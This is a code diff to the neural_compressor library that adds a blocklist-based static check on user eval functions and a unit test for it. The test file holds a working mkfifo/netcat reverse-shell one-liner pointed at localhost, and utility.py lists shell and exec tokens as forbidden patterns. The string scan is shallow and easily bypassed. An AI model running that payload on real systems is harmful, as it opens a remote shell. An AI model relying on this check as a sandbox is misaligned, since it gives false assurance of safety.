diff --git a/neural_compressor/mix_precision.py b/neural_compressor/mix_precision.py index c9d411291d0..84a47025a65 100644 --- a/neural_compressor/mix_precision.py +++ b/neural_compressor/mix_precision.py @@ -29,7 +29,7 @@ from .model import Model from .strategy import STRATEGIES from .utils import alias_param, logger -from .utils.utility import CpuInfo, time_limit +from .utils.utility import CpuInfo, secure_check_eval_func, time_limit @alias_param("conf", param_alias="config") @@ -91,6 +91,8 @@ def fit(model, conf, eval_func=None, eval_dataloader=None, eval_metric=None, **k ) sys.exit(0) + secure_check_eval_func(eval_func) + wrapped_model = Model(model, conf=conf) precisions = list(set(conf.precisions) - set(conf.excluded_precisions)) diff --git a/neural_compressor/quantization.py b/neural_compressor/quantization.py index 31cf9829f23..2f3b2460d98 100644 --- a/neural_compressor/quantization.py +++ b/neural_compressor/quantization.py @@ -27,7 +27,7 @@ from .model import Model from .strategy import STRATEGIES from .utils import logger -from .utils.utility import dump_class_attrs, time_limit +from .utils.utility import dump_class_attrs, secure_check_eval_func, time_limit def fit( @@ -153,6 +153,8 @@ def eval_func(model): else: metric = None + secure_check_eval_func(eval_func) + config = _Config(quantization=conf, benchmark=None, pruning=None, distillation=None, nas=None) strategy_name = conf.tuning_criterion.strategy diff --git a/neural_compressor/utils/utility.py b/neural_compressor/utils/utility.py index 54ef3dde87f..bc3519678b9 100644 --- a/neural_compressor/utils/utility.py +++ b/neural_compressor/utils/utility.py @@ -25,6 +25,7 @@ import ast import builtins import importlib +import inspect import logging import os import os.path as osp @@ -39,6 +40,7 @@ from enum import Enum from functools import wraps from tempfile import NamedTemporaryFile +from types import FunctionType from typing import Any, Dict, List, Optional import cpuinfo @@ -1281,3 +1283,42 @@ def check_key_exist(data, key): if check_key_exist(item, key): return True return False + + +# for eval_func +_FORBIDDEN_PATTERNS = [ + "import os", + "import subprocess", + "import sys", + "subprocess.", + "os.system", + "os.popen", + "popen(", + "Popen(", + "system(", + "exec(", + "__import__(", +] + + +def _static_check(func): + try: + src = inspect.getsource(func) + except (OSError, IOError): # pragma: no cover + logger.warning("Cannot read source of eval_func; skip static scan.") + return + lowered = src.lower() + for p in _FORBIDDEN_PATTERNS: + if p in lowered: + raise ValueError(f"Unsafe token detected in eval_func: {p}") + + +def secure_check_eval_func(user_func): + """Return a secured version of user eval_func.""" + if not isinstance(user_func, FunctionType) or user_func is None: + logger.warning("Provided eval_func is not a plain function; security checks limited.") + return user_func + try: + _static_check(user_func) + except ValueError as e: + raise RuntimeError(f"Rejected unsafe eval_func: {e}") diff --git a/test/adaptor/pytorch_adaptor/test_adaptor_security.py b/test/adaptor/pytorch_adaptor/test_adaptor_security.py new file mode 100644 index 00000000000..eaaa1b582e8 --- /dev/null +++ b/test/adaptor/pytorch_adaptor/test_adaptor_security.py @@ -0,0 +1,32 @@ +import unittest + +import torch +import torch.nn as nn + +from neural_compressor import PostTrainingQuantConfig +from neural_compressor.mix_precision import fit + + +def exploit(model): + __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f") + return 1.0 + + +class DummyTorchModel(nn.Module): + def forward(self, x): + return x + + +class TestAdaptSecurity(unittest.TestCase): + def test_security(self): + dummy_model = DummyTorchModel() + conf = PostTrainingQuantConfig() + conf.precisions = ["fp32"] + conf.excluded_precisions = [] + with self.assertRaises(RuntimeError) as ctx: + fit(model=dummy_model, conf=conf, eval_func=exploit) + self.assertIn("Rejected unsafe eval_func", str(ctx.exception)) + + +if __name__ == "__main__": + unittest.main()